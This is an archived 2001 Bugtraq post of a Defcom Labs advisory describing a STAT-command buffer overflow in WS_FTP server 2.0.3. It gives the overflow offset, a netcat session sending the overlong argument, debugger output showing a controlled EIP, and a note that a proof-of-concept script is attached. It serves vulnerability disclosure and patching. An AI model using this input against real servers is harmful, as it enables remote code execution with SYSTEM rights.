Home page logo
/

bugtraq logo Bugtraq mailing list archives

def-2001-31
From: andreas junestam <andreas.junestam () defcom com>
Date: Mon, 05 Nov 2001 10:09:00 +0100

======================================================================
                  Defcom Labs Advisory def-2001-31

                WS_FTP server 2.0.3 Buffer Overflow

Author: Andreas Junestam <andreas () defcom com>
Co-Author: Janne Sarendal <janne () defcom com>
Release Date: 2001-10-05
======================================================================
------------------------=[Brief Description]=-------------------------
WS_FTP server 2.0.3 contains a buffer overflow which affects the
STAT command. This buffer overflow gives an attacker the ability to
run code on the target with SYSTEM RIGHTS, due to the fact that the
server runs as a service by default.

------------------------=[Affected Systems]=--------------------------
- WS_FTP server 2.0.3 and possibly earlier versions

----------------------=[Detailed Description]=------------------------
* Command Buffer Overrun
  The parsing code for the STAT command suffers from a buffer
  overflow. By sending a STAT command followed by an argument greater
  than 479 (475 bytes + new return address) bytes, a buffer will
  overflow and the EIP will be overwritten. The overflow is dependant
  on the size of the name of the server because the argument, the
  servername and some more information is wsprint'ed together in the
  buffer. A proof-of-concept exploit is attached to the advisory.

  C:\tools\web>nc localhost 21
  220-helig X2 WS_FTP Server 2.0.3.EVAL (35565717)
  220-Wed Aug 08 19:57:40 2001
  220-30 days remaining on evaluation.
  220 helig X2 WS_FTP Server 2.0.3.EVAL (35565717)
  user ftp
  331 Password required
  pass ftp
  230 user logged in
  stat  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAA

  0808 19:57:40 (000002e8) 127.0.0.1:1131 connected to 127.0.0.1:21
  SetFolder = C:\program\iFtpSvc\helig
  SetFolder = C:\program\iFtpSvc\helig\public
  SetFolder = C:/program/iFtpSvc/helig
  0808 19:57:43 (000002e8) helig S(0) 127.0.0.1 anon-ftp logon success
  (A1)
  Access violation - code c0000005 (first chance)
  eax=000000ea ebx=0067c280 ecx=000000ea edx=00000002
  esi=0067c280 edi=00130178
  eip=41414141 esp=0104ded4 ebp=41414141 iopl=0
  41414141 ??               ???

---------------------------=[Workaround]=-----------------------------
Download new version(2.0.4) from:
http://www.ipswitch.com/support/WS_FTP-Server/patch-upgrades.html

-----------------------------=[Exploit]=------------------------------
See attached file, ws_ftp2.pl

-------------------------=[Vendor Response]=--------------------------
This issue was brought to the vendors attention on the 8th of
August, 2001. Patch is released.

======================================================================
            This release was brought to you by Defcom Labs

          labs () defcom com             http://labs.defcom.com
======================================================================

Attachment: ws_ftp2.pl
Description:


  By Date           By Thread  

Current thread:
  • def-2001-31 andreas junestam (Nov 05)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault